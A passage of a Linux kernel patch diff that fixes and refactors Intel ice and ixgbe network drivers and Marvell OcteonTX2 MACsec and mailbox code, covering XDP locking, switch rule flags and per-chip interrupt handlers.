+@@ -693,17 +693,18 @@ ice_eswitch_add_tc_fltr(struct ice_vsi *vsi, struct ice_tc_flower_fltr *fltr)
+ 	 * results into order of switch rule evaluation.
+ 	 */
+ 	rule_info.priority = 7;
++	rule_info.flags_info.act_valid = true;
+ 
+ 	if (fltr->direction == ICE_ESWITCH_FLTR_INGRESS) {
+ 		rule_info.sw_act.flag |= ICE_FLTR_RX;
+ 		rule_info.sw_act.src = hw->pf_id;
+ 		rule_info.rx = true;
++		rule_info.flags_info.act = ICE_SINGLE_ACT_LB_ENABLE;
+ 	} else {
+ 		rule_info.sw_act.flag |= ICE_FLTR_TX;
+ 		rule_info.sw_act.src = vsi->idx;
+ 		rule_info.rx = false;
+ 		rule_info.flags_info.act = ICE_SINGLE_ACT_LAN_ENABLE;
+-		rule_info.flags_info.act_valid = true;
+ 	}
+ 
+ 	/* specify the cookie as filter_rule_id */
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+index f8156fe4b1dc4..0ee943db3dc92 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+@@ -1035,9 +1035,6 @@ static void ixgbe_free_q_vector(struct ixgbe_adapter *adapter, int v_idx)
+ 	adapter->q_vector[v_idx] = NULL;
+ 	__netif_napi_del(&q_vector->napi);
+ 
+-	if (static_key_enabled(&ixgbe_xdp_locking_key))
+-		static_branch_dec(&ixgbe_xdp_locking_key);
+-
+ 	/*
+ 	 * after a call to __netif_napi_del() napi may still be used and
+ 	 * ixgbe_get_stats64() might access the rings on this vector,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index faf3a094ac540..9b8848daeb430 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -6495,6 +6495,10 @@ static int ixgbe_sw_init(struct ixgbe_adapter *adapter,
+ 	set_bit(0, adapter->fwd_bitmask);
+ 	set_bit(__IXGBE_DOWN, &adapter->state);
+ 
++	/* enable locking for XDP_TX if we have more CPUs than queues */
++	if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
++		static_branch_enable(&ixgbe_xdp_locking_key);
++
+ 	return 0;
+ }
+ 
+@@ -10288,8 +10292,6 @@ static int ixgbe_xdp_setup(struct net_device *dev, struct bpf_prog *prog)
+ 	 */
+ 	if (nr_cpu_ids > IXGBE_MAX_XDP_QS * 2)
+ 		return -ENOMEM;
+-	else if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
+-		static_branch_inc(&ixgbe_xdp_locking_key);
+ 
+ 	old_prog = xchg(&adapter->xdp_prog, prog);
+ 	need_reset = (!!prog != !!old_prog);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+index 2898931d5260a..9690ac01f02c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+@@ -157,7 +157,7 @@ EXPORT_SYMBOL(otx2_mbox_init);
+  */
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 			   struct pci_dev *pdev, void *reg_base,
+-			   int direction, int ndevs)
++			   int direction, int ndevs, unsigned long *pf_bmap)
+ {
+ 	struct otx2_mbox_dev *mdev;
+ 	int devid, err;
+@@ -169,6 +169,9 @@ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 	mbox->hwbase = hwbase[0];
+ 
+ 	for (devid = 0; devid < ndevs; devid++) {
++		if (!test_bit(devid, pf_bmap))
++			continue;
++
+ 		mdev = &mbox->dev[devid];
+ 		mdev->mbase = hwbase[devid];
+ 		mdev->hwbase = hwbase[devid];
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index 8d5d5a0f68c44..11eeb36cf9a54 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -96,9 +96,10 @@ void otx2_mbox_destroy(struct otx2_mbox *mbox);
+ int otx2_mbox_init(struct otx2_mbox *mbox, void __force *hwbase,
+ 		   struct pci_dev *pdev, void __force *reg_base,
+ 		   int direction, int ndevs);
++
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void __force **hwbase,
+ 			   struct pci_dev *pdev, void __force *reg_base,
+-			   int direction, int ndevs);
++			   int direction, int ndevs, unsigned long *bmap);
+ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_wait_for_rsp(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid);
+@@ -242,9 +243,12 @@ M(NPC_MCAM_READ_BASE_RULE, 0x6011, npc_read_base_steer_rule,            \
+ M(NPC_MCAM_GET_STATS, 0x6012, npc_mcam_entry_stats,                     \
+ 				   npc_mcam_get_stats_req,              \
+ 				   npc_mcam_get_stats_rsp)              \
+-M(NPC_GET_SECRET_KEY, 0x6013, npc_get_secret_key,                     \
+-				   npc_get_secret_key_req,              \
+-				   npc_get_secret_key_rsp)              \
++M(NPC_GET_FIELD_HASH_INFO, 0x6013, npc_get_field_hash_info,                     \
++				   npc_get_field_hash_info_req,              \
++				   npc_get_field_hash_info_rsp)              \
++M(NPC_GET_FIELD_STATUS, 0x6014, npc_get_field_status,                     \
++				   npc_get_field_status_req,              \
++				   npc_get_field_status_rsp)              \
+ /* NIX mbox IDs (range 0x8000 - 0xFFFF) */				\
+ M(NIX_LF_ALLOC,		0x8000, nix_lf_alloc,				\
+ 				 nix_lf_alloc_req, nix_lf_alloc_rsp)	\
+@@ -1510,14 +1514,20 @@ struct npc_mcam_get_stats_rsp {
+ 	u8 stat_ena; /* enabled */
+ };
+ 
+-struct npc_get_secret_key_req {
++struct npc_get_field_hash_info_req {
+ 	struct mbox_msghdr hdr;
+ 	u8 intf;
+ };
+ 
+-struct npc_get_secret_key_rsp {
++struct npc_get_field_hash_info_rsp {
+ 	struct mbox_msghdr hdr;
+ 	u64 secret_key[3];
++#define NPC_MAX_HASH 2
++#define NPC_MAX_HASH_MASK 2
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_MASK(0..1) */
++	u64 hash_mask[NPC_MAX_INTF][NPC_MAX_HASH][NPC_MAX_HASH_MASK];
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_RESULT_CTRL */
++	u64 hash_ctrl[NPC_MAX_INTF][NPC_MAX_HASH];
+ };
+ 
+ enum ptp_op {
+@@ -1541,6 +1551,17 @@ struct ptp_rsp {
+ 	u64 clk;
+ };
+ 
++struct npc_get_field_status_req {
++	struct mbox_msghdr hdr;
++	u8 intf;
++	u8 field;
++};
++
++struct npc_get_field_status_rsp {
++	struct mbox_msghdr hdr;
++	u8 enable;
++};
++
+ struct set_vf_perm  {
+ 	struct  mbox_msghdr hdr;
+ 	u16	vf;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index f68a6a0e3aa41..c43f19dfbd744 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -473,6 +473,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -480,6 +482,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -494,6 +498,9 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 
+ 	/* Flow entry */
+ 	flow_id = mcs->hw->tcam_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(flow_id, mcs->rx.flow_ids.bmap);
++	__set_bit(flow_id, mcs->tx.flow_ids.bmap);
++
+ 	for (reg_id = 0; reg_id < 4; reg_id++) {
+ 		reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 		mcs_reg_write(mcs, reg, GENMASK_ULL(63, 0));
+@@ -504,6 +511,8 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	}
+ 	/* secy */
+ 	secy_id = mcs->hw->secy_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(secy_id, mcs->rx.secy.bmap);
++	__set_bit(secy_id, mcs->tx.secy.bmap);
+ 
+ 	/* Set validate frames to NULL and enable control port */
+ 	plcy = 0x7ull;
+@@ -528,6 +537,7 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	/* Enable Flowid entry */
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_RX, true);
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_TX, true);
++
+ 	return 0;
+ }
+ 
+@@ -926,60 +936,42 @@ static void mcs_tx_misc_intr_handler(struct mcs *mcs, u64 intr)
+ 	mcs_add_intr_wq_entry(mcs, &event);
+ }
+ 
+-static void mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	u64 val, reg;
++	int lmac;
+ 
+-	if (!(intr & MCS_BBE_INT_MASK))
++	if (!(intr & 0x6ULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
++	if (intr & BIT_ULL(1))
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0;
++	else
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0;
++	val = mcs_reg_read(mcs, reg);
+ 
+-	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
++	/* policy/data over flow occurred */
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (!(val & BIT_ULL(lmac)))
+ 			continue;
+-
+-		/* Lower nibble denotes data fifo overflow interrupts and
+-		 * upper nibble indicates policy fifo overflow interrupts.
+-		 */
+-		if (intr & 0xFULL)
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
+-		else
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into BBE fatal error */
+-		event.lmac_id = i & 0x3ULL;
+-		mcs_add_intr_wq_entry(mcs, &event);
++		dev_warn(mcs->dev, "BEE:Policy or data overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+-static void mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	int lmac;
+ 
+-	if (!(intr & MCS_PAB_INT_MASK))
++	if (!(intr & 0xFFFFFULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
+-
+-	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
+-			continue;
+-
+-		event.intr_mask = (dir == MCS_RX) ? MCS_PAB_RX_CHAN_OVERFLOW_INT :
+-				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into PAB fatal error */
+-		event.lmac_id = i;
+-		mcs_add_intr_wq_entry(mcs, &event);
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (intr & BIT_ULL(lmac))
++			dev_warn(mcs->dev, "PAB: overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+@@ -988,9 +980,8 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	struct mcs *mcs = (struct mcs *)mcs_irq;
+ 	u64 intr, cpm_intr, bbe_intr, pab_intr;
+ 
+-	/* Disable and clear the interrupt */
++	/* Disable  the interrupt */
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1C, BIT_ULL(0));
+-	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 
+ 	/* Check which block has interrupt*/
+ 	intr = mcs_reg_read(mcs, MCSX_TOP_SLAVE_INT_SUM);
+@@ -1037,7 +1028,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE RX */
+ 	if (intr & MCS_BBE_RX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_RX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1047,7 +1038,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE TX */
+ 	if (intr & MCS_BBE_TX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_TX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1057,7 +1048,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB RX */
+ 	if (intr & MCS_PAB_RX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_RX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_INTR_RW, 0);
+@@ -1067,14 +1058,15 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB TX */
+ 	if (intr & MCS_PAB_TX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_TX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_INTR_RW, 0);
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT, pab_intr);
+ 	}
+ 
+-	/* Enable the interrupt */
++	/* Clear and enable the interrupt */
++	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1S, BIT_ULL(0));
+ 
+ 	return IRQ_HANDLED;
+@@ -1156,7 +1148,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 		return ret;
+ 	}
+ 
+-	ret = request_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP),
++	ret = request_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec),
+ 			  mcs_ip_intr_handler, 0, "MCS_IP", mcs);
+ 	if (ret) {
+ 		dev_err(mcs->dev, "MCS IP irq registration failed\n");
+@@ -1175,11 +1167,11 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	mcs_reg_write(mcs, MCSX_CPM_TX_SLAVE_TX_INT_ENB, 0x7ULL);
+ 	mcs_reg_write(mcs, MCSX_CPM_RX_SLAVE_RX_INT_ENB, 0x7FULL);
+ 
+-	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xFFULL);
++	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xFFULL);
+ 
+-	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
++	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
+ 
+ 	mcs->tx_sa_active = alloc_mem(mcs, mcs->hw->sc_entries);
+ 	if (!mcs->tx_sa_active) {
+@@ -1190,7 +1182,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	return ret;
+ 
+ free_irq:
+-	free_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec), mcs);
+ exit:
+ 	pci_free_irq_vectors(mcs->pdev);
+ 	mcs->num_vec = 0;
+@@ -1325,8 +1317,11 @@ void mcs_reset_port(struct mcs *mcs, u8 port_id, u8 reset)
+ void mcs_set_lmac_mode(struct mcs *mcs, int lmac_id, u8 mode)
+ {
+ 	u64 reg;
++	int id = lmac_id * 2;
+ 
+-	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(lmac_id * 2);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(id);
++	mcs_reg_write(mcs, reg, (u64)mode);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG((id + 1));
+ 	mcs_reg_write(mcs, reg, (u64)mode);
+ }
+ 
+@@ -1484,6 +1479,7 @@ void cn10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 20;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 5;		/* x2p clabration intf */
+ 	hw->mcs_blks = 1;		/* MCS blocks */
++	hw->ip_vec = MCS_CN10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ static struct mcs_ops cn10kb_mcs_ops = {
+@@ -1492,6 +1488,8 @@ static struct mcs_ops cn10kb_mcs_ops = {
+ 	.mcs_tx_sa_mem_map_write	= cn10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cn10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cn10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cn10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cn10kb_mcs_pab_intr_handler,
+ };
+ 
+ static int mcs_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+@@ -1592,7 +1590,7 @@ static void mcs_remove(struct pci_dev *pdev)
+ 
+ 	/* Set MCS to external bypass */
+ 	mcs_set_external_bypass(mcs, true);
+-	free_irq(pci_irq_vector(pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(pdev, mcs->hw->ip_vec), mcs);
+ 	pci_free_irq_vectors(pdev);
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+index 64dc2b80e15dd..0f89dcb764654 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+@@ -43,24 +43,15 @@
+ /* Reserved resources for default bypass entry */
+ #define MCS_RSRC_RSVD_CNT		1
+ 
+-/* MCS Interrupt Vector Enumeration */
+-enum mcs_int_vec_e {
+-	MCS_INT_VEC_MIL_RX_GBL		= 0x0,
+-	MCS_INT_VEC_MIL_RX_LMACX	= 0x1,
+-	MCS_INT_VEC_MIL_TX_LMACX	= 0x5,
+-	MCS_INT_VEC_HIL_RX_GBL		= 0x9,
+-	MCS_INT_VEC_HIL_RX_LMACX	= 0xa,
+-	MCS_INT_VEC_HIL_TX_GBL		= 0xe,
+-	MCS_INT_VEC_HIL_TX_LMACX	= 0xf,
+-	MCS_INT_VEC_IP			= 0x13,
+-	MCS_INT_VEC_CNT			= 0x14,
+-};
++/* MCS Interrupt Vector */
++#define MCS_CNF10KB_INT_VEC_IP	0x13
++#define MCS_CN10KB_INT_VEC_IP	0x53
+ 
+ #define MCS_MAX_BBE_INT			8ULL
+ #define MCS_BBE_INT_MASK		0xFFULL
+ 
+-#define MCS_MAX_PAB_INT			4ULL
+-#define MCS_PAB_INT_MASK		0xFULL
++#define MCS_MAX_PAB_INT		8ULL
++#define MCS_PAB_INT_MASK	0xFULL
+ 
+ #define MCS_BBE_RX_INT_ENA		BIT_ULL(0)
+ #define MCS_BBE_TX_INT_ENA		BIT_ULL(1)
+@@ -137,6 +128,7 @@ struct hwinfo {
+ 	u8 lmac_cnt;
+ 	u8 mcs_blks;
+ 	unsigned long	lmac_bmap; /* bitmap of enabled mcs lmac */
++	u16 ip_vec;
+ };
+ 
+ struct mcs {
+@@ -165,6 +157,8 @@ struct mcs_ops {
+ 	void	(*mcs_tx_sa_mem_map_write)(struct mcs *mcs, struct mcs_tx_sc_sa_map *map);
+ 	void	(*mcs_rx_sa_mem_map_write)(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ 	void	(*mcs_flowid_secy_map)(struct mcs *mcs, struct secy_mem_map *map, int dir);
++	void	(*mcs_bbe_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++	void	(*mcs_pab_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ };
+ 
+ extern struct pci_driver mcs_driver;
+@@ -219,6 +213,8 @@ void cn10kb_mcs_tx_sa_mem_map_write(struct mcs *mcs, struct mcs_tx_sc_sa_map *ma
+ void cn10kb_mcs_flowid_secy_map(struct mcs *mcs, struct secy_mem_map *map, int dir);
+ void cn10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ void cn10kb_mcs_parser_cfg(struct mcs *mcs);
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* CNF10K-B APIs */
+ struct mcs_ops *cnf10kb_get_mac_ops(void);
+@@ -229,6 +225,8 @@ void cnf10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *m
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_thresh_reached_handler(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs);
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* Stats APIs */
+ void mcs_get_sc_stats(struct mcs *mcs, struct mcs_sc_stats *stats, int id, int dir);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+index 7b62054144286..9f9b904ab2cd0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+@@ -13,6 +13,8 @@ static struct mcs_ops cnf10kb_mcs_ops   = {
+ 	.mcs_tx_sa_mem_map_write	= cnf10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cnf10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cnf10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cnf10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cnf10kb_mcs_pab_intr_handler,
+ };
+ 
+ struct mcs_ops *cnf10kb_get_mac_ops(void)
+@@ -31,6 +33,7 @@ void cnf10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 4;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 1;		/* x2p clabration intf */
+ 	hw->mcs_blks = 7;		/* MCS blocks */
++	hw->ip_vec = MCS_CNF10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs)
+@@ -212,3 +215,63 @@ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs)
+ 		mcs_add_intr_wq_entry(mcs, &event);
+ 	}
+ }
++
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_BBE_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		/* Lower nibble denotes data fifo overflow interrupts and
++		 * upper nibble indicates policy fifo overflow interrupts.
++		 */
++		if (intr & 0xFULL)
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
++		else
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
++
++		/* Notify the lmac_id info which ran into BBE fatal error */
++		event.lmac_id = i & 0x3ULL;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
++
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_PAB_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		event.intr_mask = (dir == MCS_RX) ?
++				  MCS_PAB_RX_CHAN_OVERFLOW_INT :
++				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
++
++		/* Notify the lmac_id info which ran into PAB fatal error */
++		event.lmac_id = i;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+index c95a8b8f5eaf7..f3ab01fc363c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+@@ -97,6 +97,7 @@
+ #define MCSX_PEX_TX_SLAVE_VLAN_CFGX(a)          (0x46f8ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_CUSTOM_TAG_REL_MODE_SEL(a)	(0x788ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_PORT_CONFIG(a)		(0x4738ull + (a) * 0x8ull)
++#define MCSX_PEX_RX_SLAVE_PORT_CFGX(a)		(0x3b98ull + (a) * 0x8ull)
+ #define MCSX_PEX_RX_SLAVE_RULE_ETYPE_CFGX(a) ({	\
+ 	u64 offset;					\
+ 							\
+@@ -275,7 +276,10 @@
+ #define MCSX_BBE_RX_SLAVE_CAL_ENTRY			0x180ull
+ #define MCSX_BBE_RX_SLAVE_CAL_LEN			0x188ull
+ #define MCSX_PAB_RX_SLAVE_FIFO_SKID_CFGX(a)		(0x290ull + (a) * 0x40ull)
+-
++#define MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0		0xe20
++#define MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0		0x1298
